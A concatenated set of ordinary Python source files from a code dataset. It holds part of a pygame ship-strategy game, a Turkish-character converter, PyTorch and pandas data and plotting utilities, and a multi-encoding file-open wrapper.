misc.normalisedAngle(math.atan((self.x-x)/(y-self.y))+math.pi)\n\n def distanceFrom(self, x, y):\n #Pythagoras up in this. yeah boy.\n return math.sqrt((self.x-x)**2 + (self.y-y)**2)\n\n def offsetPoints(self):\n points = []\n for point in self.points:\n points.append(((point[0] - self.view.x) * self.view.zoom, (point[1] - self.view.y) * self.view.zoom))\n return points\n\n def nextOrder(self):\n self.orders.pop(0)\n if len(self.orders) == 0:\n self.moving = False\n self.orders.append(orders.Idle(self))\n\n def queueOrder(self, order):\n if len(self.orders) > 0:\n if not isinstance(self.orders[-1], orders.Idle):\n self.orders.append(order)\n self.orders[-1].setShip(self)\n else:\n self.setOrder(order)\n else:\n self.setOrder(order)\n\n def setOrder(self, order):\n if self.built:\n self.orders = [order]\n self.orders[0].setShip(self)\n else:\n self.orders = [orders.Idle(self), order]\n self.orders[1].setShip(self)\n\n def justBuilt(self):\n self.nextOrder()\n self.built = True\n\n def select(self):\n self.view.selectedShips.append(self)\n\n def drawBounding( self ):\n #Calculate the scaled center\n xCenter = ( self.x - self.view.x ) * self.view.zoom;\n yCenter = ( self.y - self.view.y ) * self.view.zoom;\n\n #Calculate the scaled size\n zSize = ( ( self.shieldRadius ) * self.view.zoom )\n\n #Calculate the minimum x for the bounding box\n xMin = xCenter - zSize\n xMax = xCenter + zSize\n \n #Calculate the minimum y for the bounding box\n yMin = yCenter - zSize\n yMax = yCenter + zSize\n \n #Draw bounding circle\n pygame.draw.circle(self.view.screen, misc.MIDGREEN, ((self.x - self.view.x) * self.view.zoom, (self.y - self.view.y) * self.view.zoom), (self.shieldRadius + 2) * self.view.zoom, 1)\n\t\t\n \"\"\"\n #Draw bounding box of object\n \n pygame.draw.line(self.view.screen, misc.GREY, ( xMin, yMax ), ( xMax, yMax ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMax, yMax ), ( xMax, yMin ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMax, yMin ), ( xMin, yMin ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMin, yMin ), ( xMin, yMax ),2 )\n \"\"\"\n \n # SPECIFC SHIP CLASSES START HERE ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !\n\nclass S1s1(Ship):\n \"\"\" as of rev 12 now a list\"\"\"\n health = 10\n radius = 5\n shieldRadius = 5\n #buildInfo\n buildCost = 2\n buildTime = 400\n rotateSpeed = 0.05\n speed = 1\n canAttack = True # this ship has a weapon! useful for setting ui & making sure that ships that can't attack when selected\n # with those that can don't get an erroneus attack order.\n launchers = [] # weapon related values\n hardpoints = []\n \n def __init__(self, view, player, x, y):\n self.enginePoint = (x, y) # engine points. one needs to be initialised so it is...\n \"\"\"\n Please note that enginePoints function like hardpoints, due to the nature of the flickerCircle effect.\n Ho hum. If a ship has more than three engines i'll code it as a list. or something.\n \n On S1s1 it's calcpointed as a point nearer the rear of the ship.\n \"\"\"\n # and we create a FlickerCircle for it...\n # FlickerCircle.__init__(self, view, xyAsTuple, size, speed, colour):\n self.engineFlicker = effects.FlickerCircle(view, self.enginePoint, 2.5, 0.25, misc.WHITE)\n view.lowEffects.append(self.engineFlicker)\n # this needs to have it's xy updated in calcpoints.\n Ship.__init__(self, view, player, x, y)\n \n def calcPoints(self):\n #calculate the three points of the triangle relative to the center xy of the ship\n #and the radius given to the ship.\n \n # starboard side\n self.points = [(self.x + self.radius * math.sin(self.rotation), (self.y - self.radius * math.cos(self.rotation))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.7 * math.pi / 3))),\\\n # these two lines are the inner dips for the engine.\n (self.x + (self.radius-3) * math.sin(self.rotation + 2.6 * math.pi / 3), (self.y - (self.radius-3) * math.cos(self.rotation + 2.6 * math.pi / 3))),\\\n (self.x + (self.radius-3) * math.sin(self.rotation + 3.4 * math.pi / 3), (self.y - (self.radius-3) * math.cos(self.rotation + 3.4 * math.pi / 3))),\\\n # port side.\n (self.x + self.radius * math.sin(self.rotation + 3.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.7 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \n def calcExtras(self):\n self.hardpoints = [(self.x + (self.radius + 3) * math.sin(self.rotation), (self.y - (self.radius + 8) * math.cos(self.rotation)), self.rotation)]\n # engine point calcs. THESE NEED TO BE MOVED TO CALCPOINTS WHEN THEY'RE ONLY DRAWING WHEN ONSCREEN.\n # calculate the xy.\n self.enginePoint = ((self.x + (self.radius - 3.5) * math.sin(self.rotation + 3 * math.pi / 3)), (self.y - (self.radius - 3.5) * math.cos(self.rotation + 3 * math.pi / 3)))\n # update the xy.\n if self.moving:\n self.engineFlicker.xy = self.enginePoint\n self.engineFlicker.visible = True # this could be handled in the poll of the FlickerCircle.\n # but it would be less offscreen efficient - this only gets polled when onscreen.\n else:\n self.engineFlicker.visible = False\n i = 0\n for launcher in self.launchers:\n launcher.hardpoint = self.hardpoints[i]\n launcher.poll()\n i += 1\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. Dunno if we want need these but hum.\n self.engineFlicker.die()\n\nclass S1s2(Ship):\n \"\"\" as of rev 12, now a list \"\"\"\n intEnginePoint = [2, 3]\n\n #buildInfo\n buildCost = 10\n buildTime = 10\n \n def calcPoints(self):\n self.points = [((self.x + self.radius * math.sin(self.rotation)), (self.y - self.radius * math.cos(self.rotation))),\\\n (self.x + self.radius * math.sin(self.rotation + 1.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 1.7 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 4.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 4.3 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \nclass S1s4(Ship):\n \"\"\" Spear class cruiser \"\"\"\n health = 50\n radius = 20\n shieldRadius = 22\n #buildInfo\n buildCost = 10\n buildTime = 1000\n rotateSpeed = 0.005\n speed = 0.2\n canAttack = True # this ship has a weapon! useful for setting ui & making sure that ships that can't attack when selected\n # with those that can don't get an erroneus attack order.\n launchers = [] # weapon related values\n hardpoints = []\n \n def __init__(self, view, player, x, y):\n self.enginePoint2 = self.enginePoint1 = (x, y) # engine points. one needs to be initialised so it is...\n \"\"\"\n Please note that enginePoints function like hardpoints, due to the nature of the flickerCircle effect.\n Ho hum. If a ship has more than three engines i'll code it as a list. or something.\n \n On S1s1 it's calcpointed as a point nearer the rear of the ship.\n \"\"\"\n # and we create a FlickerCircle for it...\n # FlickerCircle.__init__(self, view, xyAsTuple, size, speed, colour):\n self.engineFlicker1 = effects.FlickerCircle(view, self.enginePoint1, 2.5, 0.25, misc.WHITE)\n self.engineFlicker2 = effects.FlickerCircle(view, self.enginePoint2, 2.5, 0.25, misc.WHITE)\n view.lowEffects.append(self.engineFlicker1)\n view.lowEffects.append(self.engineFlicker2)\n # this needs to have it's xy updated in calcpoints.\n Ship.__init__(self, view, player, x, y)\n \n def calcPoints(self):\n # HOLY COW!\n # starboard side\n # point 0: 0, 0 for this ship. Pointy.\n self.points = [(self.x + self.radius * math.sin(self.rotation), (self.y - self.radius * math.cos(self.rotation))),\\\n # point 1: 2.28 & 9.75 15 - 9.75 = 5.25\n (self.x + (self.radius-5.25) * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - (self.radius-5.25) * math.cos(self.rotation + 2.3 * math.pi / 3))),\\\n # point 2: 2.67 @ 46 ... = 3.5\n (self.x + (self.radius-3.5) * math.sin(self.rotation + 2.67 * math.pi / 3), (self.y - (self.radius-3.5) * math.cos(self.rotation + 2.67 * math.pi / 3))),\\\n # Starboard side engine.\n # point 3: 2.6 & 17.5 ... 15 - 4.375 = 10.625 !!! minus four'd!\n (self.x + (self.radius-6.625) * math.sin(self.rotation + 2.6 * math.pi / 3), (self.y - (self.radius-6.625) * math.cos(self.rotation + 2.6 * math.pi / 3))),\\\n # point 4: 2.79 ~ 2.8 & 14.0 ... 15 - 3.5 = 11.5 !!! minus four'd\n (self.x + (self.radius-7.5) * math.sin(self.rotation + 2.8 * math.pi / 3), (self.y - (self.radius-7.5) * math.cos(self.rotation + 2.8 * math.pi / 3))),\\\n # begin tail assembly.\n # point 5: 2.87 & 49.5 ... 15 - 12.375 = 2.625\n (self.x + (self.radius-2.625) * math.sin(self.rotation + 2.87 * math.pi / 3), (self.y - (self.radius-2.625) * math.cos(self.rotation + 2.87 * math.pi / 3))),\\\n # tail point.\n # point 6: 3 & radius.\n (self.x + self.radius * math.sin(self.rotation + 3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3 * math.pi / 3))),\\\n # final tail point.\n # point 7 equiv 5.\n (self.x + (self.radius-2.625) * math.sin(self.rotation + 3.13 * math.pi / 3), (self.y - (self.radius-2.625) * math.cos(self.rotation + 3.13 * math.pi / 3))),\\\n # Portside engine.\n # point 8 equiv 4. !!! minus 4'd\n (self.x + (self.radius-7.5) * math.sin(self.rotation + 3.2 * math.pi / 3), (self.y - (self.radius-7.5) * math.cos(self.rotation + 3.2 * math.pi / 3))),\\\n # point 9 equiv 3. !!! minus 4'd\n (self.x + (self.radius-6.625) * math.sin(self.rotation + 3.4 * math.pi / 3), (self.y - (self.radius-6.625) * math.cos(self.rotation + 3.4 * math.pi / 3))),\\\n # Port side.\n # point 10 equiv 2.\n (self.x + (self.radius-3.5) * math.sin(self.rotation + 3.33 * math.pi / 3), (self.y - (self.radius-3.5) * math.cos(self.rotation + 3.33 * math.pi / 3))),\\\n # point 11 equiv 1.\n (self.x + (self.radius-5.25) * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - (self.radius-5.25) * math.cos(self.rotation + 3.7 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \n def calcExtras(self):\n self.hardpoints = [(self.x + (self.radius+2) * math.sin(self.rotation), (self.y - (self.radius+2) * math.cos(self.rotation)), self.rotation)]\n self.hardpoints.append((self.x + (self.radius+2) * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - (self.radius+2) * math.cos(self.rotation + 2.3 * math.pi / 3)), self.rotation + 2.3))\n self.hardpoints.append((self.x + (self.radius+2) * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - (self.radius+2) * math.cos(self.rotation + 3.7 * math.pi / 3)), self.rotation + 3.7))\n # engine point calcs. THESE NEED TO BE MOVED TO CALCPOINTS WHEN THEY'RE ONLY DRAWING WHEN ONSCREEN.\n # calculate the xy.\n self.enginePoint1 = ((self.x + (self.radius - 7) * math.sin(self.rotation + 2.7 * math.pi / 3)), (self.y - (self.radius - 7) * math.cos(self.rotation + 2.7 * math.pi / 3)))\n self.enginePoint2 = ((self.x + (self.radius - 7) * math.sin(self.rotation + 3.3 * math.pi / 3)), (self.y - (self.radius - 7) * math.cos(self.rotation + 3.3 * math.pi / 3)))\n # update the xy.\n if self.moving:\n self.engineFlicker1.xy = self.enginePoint1\n self.engineFlicker2.xy = self.enginePoint2\n self.engineFlicker1.visible = True\n self.engineFlicker2.visible = True\n else:\n self.engineFlicker1.visible = False\n self.engineFlicker2.visible = False\n i = 0\n for launcher in self.launchers:\n launcher.hardpoint = self.hardpoints[i]\n launcher.poll()\n i += 1\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. Dunno if we want need these but hum.\n self.engineFlicker1.die()\n self.engineFlicker2.die()\n\n\nclass S1s6(Ship):\n \"\"\" Carrier \"\"\"\n intEnginePoint = [0, 0]\n buildPoints = [(0,0),(0,0)]\n buildQueue = []\n building = False\n buildTimeRemaining = 0\n buildShip = Ship\n\n health = 40\n\n radius = 25\n\n rotateSpeed = 0.004\n speed = 0.1\n\n #buildInfo\n buildCost = 10\n buildTime = 1000\n \n availableToBuild = [S1s1]\n \n def calcPoints(self):\n self.points = [(self.x + self.radius * math.sin(self.rotation + 5.8 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 5.8 * math.pi /3))),\\\n (self.x + self.radius * math.sin(self.rotation + 0.2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 0.2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.8 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.8 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3.2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 4 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 4 * math.pi / 3)))]\n self.needsToCalcPoints = False\n\n def calcExtras(self):\n self.buildPoints[0] = (self.x + (self.radius + 10) * math.sin(self.rotation)), (self.y - (self.radius + 10) * math.cos(self.rotation))\n\n def poll(self):\n #standard poll functions\n self.orders[0].poll()\n self.calcExtras()\n if self.building == False and len(self.buildQueue) > 0:\n self.buildShip = self.buildQueue.pop(0)\n self.buildShip.orders = [orders.Idle(self)]\n self.buildShip.rotation = self.rotation\n self.player.resources -= self.buildShip.buildCost\n self.buildTimeRemaining = self.buildShip.buildTime\n self.player.ships.append(self.buildShip) # Add to list of ships.\n# print ships\n self.building = True\n elif self.building == True:\n# print self.buildTimeRemaining\n self.buildTimeRemaining -= 1\n self.buildShip.x = self.buildPoints[0][0]\n# print self.buildShip.x\n self.buildShip.y = self.buildPoints[0][1]\n #self.buildShip.rotation = self.rotation\n self.buildShip.rotation = misc.normalisedAngle(0.02 + self.buildShip.rotation)\n self.buildShip.calcPoints()\n self.buildShip.colour = ((self.player.colour[0] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime),\\\n (self.player.colour[1] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime),\\\n (self.player.colour[2] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime))\n #print self.buildShip.colour\n\n if self.buildTimeRemaining == 1:\n #self.buildShip.setOrder(orders.MoveToXY(10,10))\n self.buildShip.justBuilt()\n self.building = False \n\n def addToBuildQueue(self, ship): #Currently only produces triangles. only works on buildships.\n self.buildQueue.append(ship(self.view, self.player, self.buildPoints[0][0], self.buildPoints[0][1])) # Pete, you forgot the self. prefix\n","sub_path":"ships.py","file_name":"ships.py","file_ext":"py","file_size_in_byte":22205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"585835301","text":"def turkish_chars_to_ascii_chars(turkish_string):\n turkish_chars = ['ç', 'ğ', 'ı', 'ö', 'ş', 'ü']\n latin_chars = ['c', 'g', 'i', 'o', 's', 'u']\n\n cleared_str = ''\n for s in turkish_string:\n try:\n index_of_ascii_char = turkish_chars.index(s)\n cleared_str += latin_chars[index_of_ascii_char]\n except ValueError:\n # means that: it is not a special Turkish char\n cleared_str += s\n return cleared_str\n","sub_path":"horsing_around/tests/string_util.py","file_name":"string_util.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"291096265","text":"\"\"\"\nThis modules contains utility functions for data manipulation and plotting of\nresults and data\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\nimport torch\n\n\n#######################################################\n# Data Utilities \n#######################################################\n\ndef load_trained_model(previous_model, model, optimizer):\n \n checkpoint = torch.load(previous_model)\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n model.eval()\n \n return model, optimizer\n\n\ndef save_trained_model(save_path, epoch, model, optimizer, train_loss, test_loss):\n save_dict = {\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n# 'train_losses': train_loss\n# 'test_losses': [pce_test_loss, voc_test_loss,\n# jsc_test_loss, ff_test_loss]\n 'optimizer': optimizer.state_dict()\n }\n \n torch.save(save_dict, save_path)\n return\n\n\ndef df_MinMax_normalize(dataframe):\n \n df = dataframe\n \n normed_df = pd.DataFrame()\n\n df_norm_key = {}\n\n for colname, coldata in df.iteritems():\n max_val = coldata.max()\n min_val = coldata.min()\n\n df_norm_key[colname] = [min_val, max_val]\n\n normed_col = (coldata - min_val) / (max_val - min_val)\n normed_df[colname] = normed_col\n \n return normed_df, df_norm_key \n\n\ndef df_MinMax_denormalize(normed_df, norm_key):\n \n denormed_df = pd.DataFrame()\n \n for colname, coldata in normed_df.iteritems():\n mn = norm_key[colname][0]\n mx = norm_key[colname][1]\n \n denormed_col = (coldata * (mx - mn)) + mn\n \n denormed_df[colname] = denormed_col\n \n return denormed_df\n\n\ndef df_Gaussian_normalize(dataframe):\n \n df = dataframe\n normed_df = pd.DataFrame()\n norm_key = {}\n \n for colname, coldata in df.iteritems():\n stdev = coldata.std()\n mean = coldata.mean()\n \n normed_col = (coldata - mean) / stdev\n normed_df[colname] = normed_col\n \n norm_key[colname] = [mean, stdev]\n \n return normed_df, norm_key\n\n\n#######################################################\n# Network Model Utilities\n#######################################################\n\ndef init_weights(model):\n if type(model) == torch.nn.Linear:\n torch.nn.init.xavier_uniform_(model.weight)\n model.bias.data.fill_(0.01)\n \n# if type(model) == nn.BatchNorm1d:\n# model.reset_parameters()\n\n \n\n#######################################################\n# Plotting Utilities\n#######################################################\n\ndef plot_OPV_df_loss(epochs, train_epoch_losses, test_epoch_losses,\n pce_train_epoch_losses, pce_test_epoch_losses,\n voc_train_epoch_losses, voc_test_epoch_losses,\n jsc_train_epoch_losses, jsc_test_epoch_losses,\n ff_train_epoch_losses, ff_test_epoch_losses):\n \n \n fig, ax = plt.subplots(figsize = (8,6))\n \n plt.plot(epochs, train_epoch_losses, c = 'k', label = 'training error')\n plt.plot(epochs, test_epoch_losses, c = 'r', label = 'testing error')\n plt.legend(loc = 'upper right')\n plt.title(\"Total Training & Testing Error\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Total MSE Loss')\n plt.show()\n \n fig, ax = plt.subplots(figsize = (8,6))\n\n plt.plot(epochs[::], pce_train_epoch_losses[::], c = 'k', label = 'pce training')\n plt.plot(epochs[::], pce_test_epoch_losses[::], '-.', c = 'k', label = 'pce testing')\n\n plt.plot(epochs[::], voc_train_epoch_losses[::], c = 'r', label = 'voc training')\n plt.plot(epochs[::], voc_test_epoch_losses[::], '-.', c = 'r', label = 'voc testing')\n\n plt.plot(epochs[::], jsc_train_epoch_losses[::], c = 'g', label = 'jsc training')\n plt.plot(epochs[::], jsc_test_epoch_losses[::], '-.', c = 'g', label = 'jsc testing') \n \n plt.plot(epochs[::], ff_train_epoch_losses[::], c = 'b', label = 'ff training') \n plt.plot(epochs[::], ff_test_epoch_losses[::], '-.', c = 'b', label = 'ff testing') \n\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Training & Testing Error\")\n ax.set_xlabel('epoch')\n ax.set_ylabel('MSE')\n plt.show()\n \n return\n\ndef plot_OPV_df_accuracies(epochs, pce_test_epoch_accuracies, voc_test_epoch_accuracies, \n jsc_test_epoch_accuracies, ff_test_epoch_accuracies):\n \n fig, ax = plt.subplots(figsize = (8,6))\n # plt.plot(epochs, train_epoch_accuracy, c = 'k', label = 'training accuracy')\n plt.plot(epochs, pce_test_epoch_accuracies, c = 'k', label = 'pce MAPE')\n plt.plot(epochs, voc_test_epoch_accuracies, c = 'r', label = 'voc MAPE')\n plt.plot(epochs, jsc_test_epoch_accuracies, c = 'g', label = 'jsc MAPE')\n plt.plot(epochs, ff_test_epoch_accuracies, c = 'b', label = 'ff MAPE')\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Testing Accuracy\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Mean Absolute Percent Error')\n plt.show()\n \n return\n\ndef plot_OPV_parity(pce_labels, PCE_out, voc_labels, Voc_out,\n jsc_labels, Jsc_out, ff_labels, FF_out):\n \n xlin = ylin = np.arange(-10, 10, 1)\n\n r2 = r2_score(pce_labels, PCE_out)\n fig, ax = plt.subplots(figsize = (8,6))\n plt.scatter(PCE_out, pce_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n ax.set_xlim(min(pce_labels.min(), PCE_out.min()), max(pce_labels.max(), PCE_out.max()))\n ax.set_ylim(min(pce_labels.min(), PCE_out.min()), max(pce_labels.max(), PCE_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('PCE Parity')\n plt.show()\n\n r2 = r2_score(voc_labels, Voc_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(Voc_out, voc_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(voc_labels.min(), Voc_out.min()), max(voc_labels.max(), Voc_out.max()))\n ax.set_ylim(min(voc_labels.min(), Voc_out.min()), max(voc_labels.max(), Voc_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('Voc Parity')\n plt.show()\n\n r2 = r2_score(jsc_labels, Jsc_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(Jsc_out, jsc_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(jsc_labels.min(), Jsc_out.min()), max(jsc_labels.max(), Jsc_out.max()))\n ax.set_ylim(min(jsc_labels.min(), Jsc_out.min()), max(jsc_labels.max(), Jsc_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('Jsc Parity')\n plt.show()\n\n r2 = r2_score(ff_labels, FF_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(FF_out, ff_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(ff_labels.min(), FF_out.min()), max(ff_labels.max(), FF_out.max()))\n ax.set_ylim(min(ff_labels.min(), FF_out.min()), max(ff_labels.max(), FF_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('FF Parity')\n plt.show()\n \n \ndef plot_OFET_df_loss(epochs, train_epoch_losses, test_epoch_losses,\n mu_train_epoch_losses, mu_test_epoch_losses,\n r_train_epoch_losses, r_test_epoch_losses,\n on_off_train_epoch_losses, on_off_test_epoch_losses,\n vt_train_epoch_losses, vt_test_epoch_losses):\n \n \n fig, ax = plt.subplots(figsize = (8,6))\n \n plt.plot(epochs[::], train_epoch_losses[::], c = 'k', label = 'training error')\n plt.plot(epochs[::], test_epoch_losses[::], c = 'r', label = 'testing error')\n plt.legend(loc = 'upper right')\n plt.title(\"Total Training & Testing Error\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Total MSE Loss')\n plt.show()\n \n fig, ax = plt.subplots(figsize = (8,6))\n\n plt.plot(epochs[::], mu_train_epoch_losses[::], c = 'k', label = 'mu training')\n plt.plot(epochs[::], mu_test_epoch_losses[::], '-.', c = 'k', label = 'mu testing')\n\n plt.plot(epochs[::], r_train_epoch_losses[::], c = 'r', label = 'r training')\n plt.plot(epochs[::], r_test_epoch_losses[::], '-.', c = 'r', label = 'r testing')\n\n plt.plot(epochs[::], on_off_train_epoch_losses[::], c = 'g', label = 'on_off training')\n plt.plot(epochs[::], on_off_test_epoch_losses[::], '-.', c = 'g', label = 'on_off testing') \n \n plt.plot(epochs[::], vt_train_epoch_losses[::], c = 'b', label = 'vt training') \n plt.plot(epochs[::], vt_test_epoch_losses[::], '-.', c = 'b', label = 'vt testing') \n\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Training & Testing Error\")\n ax.set_xlabel('epoch')\n ax.set_ylabel('MSE')\n plt.show()\n \n return\n\n\ndef plot_OFET_df_accuracies(epochs, mu_test_epoch_accuracies, r_test_epoch_accuracies, \n on_off_test_epoch_accuracies, vt_test_epoch_accuracies):\n \n fig, ax = plt.subplots(figsize = (8,6))\n # plt.plot(epochs, train_epoch_accuracy, c = 'k', label = 'training accuracy')\n plt.plot(epochs, mu_test_epoch_accuracies, c = 'k', label = 'mu MAPE')\n plt.plot(epochs, r_test_epoch_accuracies, c = 'r', label = 'r MAPE')\n plt.plot(epochs, on_off_test_epoch_accuracies, c = 'g', label = 'on_off MAPE')\n plt.plot(epochs, vt_test_epoch_accuracies, c = 'b', label = 'vt MAPE')\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Testing Accuracy\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Mean Absolute Percent Error')\n plt.show()\n \n return\n\n\ndef plot_OFET_parity(mu_labels, mu_out, r_labels, r_out,\n on_off_labels, on_off_out, vt_labels, vt_out):\n \n xlin = ylin = np.arange(-20, 20, 1)\n\n r2 = r2_score(mu_labels, mu_out)\n fig, ax = plt.subplots(figsize = (8,6))\n plt.scatter(mu_labels, mu_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('mu Parity')\n plt.show()\n\n r2 = r2_score(r_labels, r_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(r_labels, r_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('r Parity')\n plt.show()\n\n r2 = r2_score(on_off_labels, on_off_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(on_off_labels, on_off_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('on_off Parity')\n plt.show()\n\n r2 = r2_score(vt_labels, vt_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(vt_labels, vt_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('Vt Parity')\n plt.show()","sub_path":"m2py/networks/network_utils.py","file_name":"network_utils.py","file_ext":"py","file_size_in_byte":11565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"57935349","text":"\"\"\"\n自定义的open, 用于不同之间的编码\n\"\"\"\n\n# 支持的编码类型\nCodings = {\"utf8\", \"gbk\"}\n\n# 文件操作符类型\nfs_oprate = {\"w\", \"r\"}\n\n\nclass OprationError(Exception):\n def __str__(self):\n return \"文件操作符类型不正确!,仅支持{}\".format(\"和\".join(fs_oprate))\n\n\nclass CustomOpen:\n \"\"\"\n 重写open\n \"\"\"\n def __init__(self, file, rwmode=\"\"):\n self.rwmode = rwmode\n self.file = file\n self._f = \"\"\n self.data = \"\"\n self.__initread()\n\n def __initread(self):\n if not self.rwmode:\n for code in Codings:\n try:\n self._f = open(self.file, encoding=code)\n self.data = self._f.read()\n break\n except UnicodeDecodeError:\n continue\n else:\n if self.rwmode == \"r\":\n for code in Codings:\n try:\n self._f = open(self.file, self.rwmode, encoding=code)\n self.data = self._f.read()\n break\n except UnicodeDecodeError:\n continue\n if self.rwmode == \"w\":\n for code in Codings:\n try:\n self._f = open(self.file, self.rwmode, encoding=code)\n break\n except UnicodeDecodeError:\n continue\n\n def read(self):\n return self.data\n\n def write(self, content):\n self._f.write(content)\n\n def close(self):\n self._f.close()\n\n def __setattr__(self, key, value):\n if key == \"rwmode\":\n if value not in {\"r\", \"w\", \"\"}:\n raise OprationError\n super().__setattr__(key, value)\n\n\nif __name__ == \"__main__\":\n f = CustomOpen(r\"/home/tangxinwu/Desktop/workspace/Android/gradle.properties\")\n print(f.read())\n","sub_path":"infrastructure/plugin/CustomOpen.py","file_name":"CustomOpen.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"476675251","text":"''' This script produces a scatter plot of the Hourly Wind Speed (HOURLYWindSpeed) vs Hourly Station Pressure (HOURLYStationPressure).\nAny wind speeds over 70% of max wind should be colored red. 